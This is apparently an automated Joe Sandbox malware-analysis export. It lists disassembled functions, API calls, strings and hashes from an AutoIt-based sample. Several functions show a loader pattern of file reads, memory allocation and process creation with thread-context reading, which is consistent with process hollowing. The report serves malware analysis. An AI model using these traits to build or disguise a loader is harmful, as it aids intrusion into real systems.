                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                      • String ID: p1#v`K$v
                                      • API String ID: 2378138488-1068180069
                                      • Opcode ID: b5b982d9b837f38fc43582297ab8af44c248b89c08a83f96e0fa28e9a668bc04
                                      • Instruction ID: e747ac4b2f3aa260c4ebc06886979d80542e53df438bcd9d1ce083be87dfa5cb
                                      • Opcode Fuzzy Hash: b5b982d9b837f38fc43582297ab8af44c248b89c08a83f96e0fa28e9a668bc04
                                      • Instruction Fuzzy Hash: C3C10DB2A00219AFDF15DF95CC85FDEB7BDAF85310F1080AAF609E6151DB709A848F61
                                      Function 00933E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00933E79
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00933E88
                                      • LoadIconW.USER32(00000063), ref: 00933E9E
                                      • LoadIconW.USER32(000000A4), ref: 00933EB0
                                      • LoadIconW.USER32(000000A2), ref: 00933EC2
                                        • Part of subcall function 00934024: LoadImageW.USER32(00930000,00000063,00000001,00000010,00000010,00000000), ref: 00934048
                                      • RegisterClassExW.USER32(?), ref: 00933F30
                                        • Part of subcall function 00933F53: GetSysColorBrush.USER32(0000000F), ref: 00933F86
                                        • Part of subcall function 00933F53: RegisterClassExW.USER32(00000030), ref: 00933FB0
                                        • Part of subcall function 00933F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00933FC1
                                        • Part of subcall function 00933F53: LoadIconW.USER32(000000A9), ref: 00934004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 2880975755-4155596026
                                      • Opcode ID: c3b9cf3ebff8273d96ed3ce0c91a804779ea5ef4fa579d95fc781acc56be00cd
                                      • Instruction ID: 2db0698a2d603d8dddd6fe091e179688bf01441070237f4a595eeed63cb17445
                                      • Opcode Fuzzy Hash: c3b9cf3ebff8273d96ed3ce0c91a804779ea5ef4fa579d95fc781acc56be00cd
                                      • Instruction Fuzzy Hash: 022131B0E18304EBDB14DFA9ED45AA9BBF5EB48710F14422AE214A22A0D7754640EFD1
                                      Function 00933F53 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00933F86
                                      • RegisterClassExW.USER32(00000030), ref: 00933FB0
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00933FC1
                                      • LoadIconW.USER32(000000A9), ref: 00934004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 975902462-1005189915
                                      • Opcode ID: d8ca5f99b4a2d49e6a5c96672f88fd5a65e3b333931cda8f8816a944f43ecba7
                                      • Instruction ID: f5ec62eda58df9ea19c89d91a747f9ec856c8c1bc3b05a507548244c48c97299
                                      • Opcode Fuzzy Hash: d8ca5f99b4a2d49e6a5c96672f88fd5a65e3b333931cda8f8816a944f43ecba7
                                      • Instruction Fuzzy Hash: 8321C5B5929318EFDB00DFA5E989BDDBBB4FB08710F00421AF521E62A0E7B54544EF91
                                      Function 018B9A78 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1241 18b9a78-18b9b26 call 18b7488 1244 18b9b2d-18b9b53 call 18ba988 CreateFileW 1241->1244 1247 18b9b5a-18b9b6a 1244->1247 1248 18b9b55 1244->1248 1255 18b9b6c 1247->1255 1256 18b9b71-18b9b8b VirtualAlloc 1247->1256 1249 18b9ca5-18b9ca9 1248->1249 1251 18b9ceb-18b9cee 1249->1251 1252 18b9cab-18b9caf 1249->1252 1257 18b9cf1-18b9cf8 1251->1257 1253 18b9cbb-18b9cbf 1252->1253 1254 18b9cb1-18b9cb4 1252->1254 1258 18b9ccf-18b9cd3 1253->1258 1259 18b9cc1-18b9ccb 1253->1259 1254->1253 1255->1249 1260 18b9b8d 1256->1260 1261 18b9b92-18b9ba9 ReadFile 1256->1261 1262 18b9cfa-18b9d05 1257->1262 1263 18b9d4d-18b9d62 1257->1263 1266 18b9ce3 1258->1266 1267 18b9cd5-18b9cdf 1258->1267 1259->1258 1260->1249 1268 18b9bab 1261->1268 1269 18b9bb0-18b9bf0 VirtualAlloc 1261->1269 1270 18b9d09-18b9d15 1262->1270 1271 18b9d07 1262->1271 1264 18b9d72-18b9d7a 1263->1264 1265 18b9d64-18b9d6f VirtualFree 1263->1265 1265->1264 1266->1251 1267->1266 1268->1249 1272 18b9bf2 1269->1272 1273 18b9bf7-18b9c12 call 18babd8 1269->1273 1274 18b9d29-18b9d35 1270->1274 1275 18b9d17-18b9d27 1270->1275 1271->1263 1272->1249 1281 18b9c1d-18b9c27 1273->1281 1277 18b9d42-18b9d48 1274->1277 1278 18b9d37-18b9d40 1274->1278 1276 18b9d4b 1275->1276 1276->1257 1277->1276 1278->1276 1282 18b9c5a-18b9c6e call 18ba9e8 1281->1282 1283 18b9c29-18b9c58 call 18babd8 1281->1283 1289 18b9c72-18b9c76 1282->1289 1290 18b9c70 1282->1290 1283->1281 1291 18b9c78-18b9c7c CloseHandle 1289->1291 1292 18b9c82-18b9c86 1289->1292 1290->1249 1291->1292 1293 18b9c88-18b9c93 VirtualFree 1292->1293 1294 18b9c96-18b9c9f 1292->1294 1293->1294 1294->1244 1294->1249
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018B9B49
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018B9D6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                      • Instruction ID: 6a7aa13b8fc3294155208e536b6844578211f6223516a4f696318fdd2cf82b51
                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                      • Instruction Fuzzy Hash: E6A10AB4E00209EBEB14CFA8C994BEEBBB5BF48308F108159E615BB381D7759A41CF54
                                      Function 009349FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1350 9349fb-934a25 call 93bcce RegOpenKeyExW 1353 9a41cc-9a41e3 RegQueryValueExW 1350->1353 1354 934a2b-934a2f 1350->1354 1355 9a4246-9a424f RegCloseKey 1353->1355 1356 9a41e5-9a4222 call 94f4ea call 9347b7 RegQueryValueExW 1353->1356 1361 9a423d-9a4245 call 9347e2 1356->1361 1362 9a4224-9a423b call 936a63 1356->1362 1361->1355 1362->1361
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00934A1D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009A41DB
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009A421A
                                      • RegCloseKey.ADVAPI32(?), ref: 009A4249
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 84f2cfea642bae7108ae8d39bf87cb59a2e936377b29ee4699d2a35458e7c9fb
                                      • Instruction ID: 90ff7cc9ab6ecb11cbed4e56d8ad38b715f7d471b66a7d9cc6c51c5970efdae3
                                      • Opcode Fuzzy Hash: 84f2cfea642bae7108ae8d39bf87cb59a2e936377b29ee4699d2a35458e7c9fb
                                      • Instruction Fuzzy Hash: 4B117F71A41109BFEB04ABA4CE86EFF7BBCEF55354F000068B502D2191EA70AE02DB50
                                      Function 009336B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1377 9336b8-933728 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009336E6
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933707
                                      • ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 0093371B
                                      • ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 00933724
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: be1347d16f6bd0a4143a40861993e73029a6c15b5e7420ce58ce5fa7992509e3
                                      • Instruction ID: 9fac1a90ad094e9edf53276890e8c70a59b120077e98d61763d9936dec84e08e
                                      • Opcode Fuzzy Hash: be1347d16f6bd0a4143a40861993e73029a6c15b5e7420ce58ce5fa7992509e3
                                      • Instruction Fuzzy Hash: A7F0DA719692D0BAEB315757AC48E772E7DD7C6F20B04012EFA04A21A0D9610895EAF1
                                      Function 018B9838 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1482 18b9838-18b997a call 18b7488 call 18b9728 CreateFileW 1489 18b997c 1482->1489 1490 18b9981-18b9991 1482->1490 1491 18b9a31-18b9a36 1489->1491 1493 18b9998-18b99b2 VirtualAlloc 1490->1493 1494 18b9993 1490->1494 1495 18b99b6-18b99cd ReadFile 1493->1495 1496 18b99b4 1493->1496 1494->1491 1497 18b99cf 1495->1497 1498 18b99d1-18b9a0b call 18b9768 call 18b8728 1495->1498 1496->1491 1497->1491 1503 18b9a0d-18b9a22 call 18b97b8 1498->1503 1504 18b9a27-18b9a2f ExitProcess 1498->1504 1503->1504 1504->1491
                                      APIs
                                        • Part of subcall function 018B9728: Sleep.KERNELBASE(000001F4), ref: 018B9739
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018B9970
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: 7XLFOILPY94NIOMR347F8HD6
                                      • API String ID: 2694422964-4052238
                                      • Opcode ID: 4b63768d7c27009b7ae0c8d6b2330c498b6a7cf52bc678097d9dec3602b46b26
                                      • Instruction ID: 290eac818b2e2373d4065357306d9c02676b0648bd81bb8e8ec99e7df070abee
                                      • Opcode Fuzzy Hash: 4b63768d7c27009b7ae0c8d6b2330c498b6a7cf52bc678097d9dec3602b46b26
                                      • Instruction Fuzzy Hash: 8A517770D04249DAEF11DBF8C894BEEBBB9AF15304F044199E248BB2C1D6B91B45CB65
                                      Function 00934139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009339FE,?,00000001), ref: 009341DB
                                      • _free.LIBCMT ref: 009A36B7
                                      • _free.LIBCMT ref: 009A36FE
                                        • Part of subcall function 0093C833: __wsplitpath.LIBCMT ref: 0093C93E
                                        • Part of subcall function 0093C833: _wcscpy.LIBCMT ref: 0093C953
                                        • Part of subcall function 0093C833: _wcscat.LIBCMT ref: 0093C968
                                        • Part of subcall function 0093C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0093C978
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                      • API String ID: 805182592-1757145024
                                      • Opcode ID: 6d6ea7e38441a45fb0d1dc06b37cfa9340d23cd71eb302d1bc2c262cf4903b7d
                                      • Instruction ID: 6c068dcc69f072837771dd5bf2833d944991c9ba0a46b4e638c5ffbfcad684ad
                                      • Opcode Fuzzy Hash: 6d6ea7e38441a45fb0d1dc06b37cfa9340d23cd71eb302d1bc2c262cf4903b7d
                                      • Instruction Fuzzy Hash: AC916271910219AFCF04EFA4CC92AEEB7B4FF59310F548429F416AB291DB34AA45CF90
                                      Function 00934A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00935374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009F1148,?,009361FF,?,00000000,00000001,00000000), ref: 00935392
                                        • Part of subcall function 009349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00934A1D
                                      • _wcscat.LIBCMT ref: 009A2D80
                                      • _wcscat.LIBCMT ref: 009A2DB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileModuleNameOpen
                                      • String ID: \$\Include\
                                      • API String ID: 3592542968-2640467822
                                      • Opcode ID: f4db03756c1ba179ddc41538f95a5e42ed759d6f19d5d3aa1895b1293935dd0e
                                      • Instruction ID: a098c0e7603886e82240b071373b22ffa13277bdde9103f732262afcb06df20e
                                      • Opcode Fuzzy Hash: f4db03756c1ba179ddc41538f95a5e42ed759d6f19d5d3aa1895b1293935dd0e
                                      • Instruction Fuzzy Hash: 2D51827152D3409BC314EF59D982AAAB7F8FF89300F50452EF685932A1EB309908DF5A
                                      Function 009534AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • __getstream.LIBCMT ref: 009534FE
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00953539
                                      • __wopenfile.LIBCMT ref: 00953549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                      • String ID: <G
                                      • API String ID: 1820251861-2138716496
                                      • Opcode ID: bee998a4844423ae15f5d3f851fcf931aea8c12b27bfd973346555e7c001cb06
                                      • Instruction ID: 3110a0007c08a492987f2fde2ac8def95729861f7a75fe96270168b9311a3c42
                                      • Opcode Fuzzy Hash: bee998a4844423ae15f5d3f851fcf931aea8c12b27bfd973346555e7c001cb06
                                      • Instruction Fuzzy Hash: A9110A70A002069BDB12FFB39C4276E77A4AF85392B14C825FC19C7291FB34CB1997A1
                                      Function 0094D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0094D28B,SwapMouseButtons,00000004,?), ref: 0094D2BC
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0094D28B,SwapMouseButtons,00000004,?,?,?,?,0094C865), ref: 0094D2DD
                                      • RegCloseKey.KERNELBASE(00000000,?,?,0094D28B,SwapMouseButtons,00000004,?,?,?,?,0094C865), ref: 0094D2FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: d1ae361b30403670a670cdcffaaada33d38c3e236c51324c2fe83beb98a44d4b
                                      • Instruction ID: 4a8259bed96bc9fa15009ef34a7285153b61494427b656c07d535f5a7ae83714
                                      • Opcode Fuzzy Hash: d1ae361b30403670a670cdcffaaada33d38c3e236c51324c2fe83beb98a44d4b
                                      • Instruction Fuzzy Hash: 64117979616209BFDB218FA4CC84EAF7BBCEF05758F004929E801D7114E671EE40AB60
                                      Function 018B8728 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018B8F55
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018B8F79
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018B8F9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                      • Instruction ID: 5db601d6333b8c0e4081d70b69bca9f55059e8cc6e7ec050c230529bc0d1bf2d
                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                      • Instruction Fuzzy Hash: C2621B70E146189BEB24CFA4C880BDEB776EF58304F1091A9D21DEB390E7759E81CB59
                                      Function 0095365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                      • String ID:
                                      • API String ID: 3877424927-0
                                      • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                      • Instruction ID: 5cbcba76d2cc548bbd59434b77b8f0f0ad0ea01e4603c5387bbb408f5e73a151
                                      • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                      • Instruction Fuzzy Hash: B951EAB1E01305ABCB28CF6BC88566E77A5AF443A2F24C72DFC25862D0D7759F589B40
                                      Function 0097C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00934517: _fseek.LIBCMT ref: 0093452F
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C65D
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C670
                                      • _free.LIBCMT ref: 0097C4DD
                                      • _free.LIBCMT ref: 0097C4E4
                                      • _free.LIBCMT ref: 0097C54F
                                        • Part of subcall function 00951C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00957A85), ref: 00951CB1
                                        • Part of subcall function 00951C9D: GetLastError.KERNEL32(00000000,?,00957A85), ref: 00951CC3
                                      • _free.LIBCMT ref: 0097C557
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
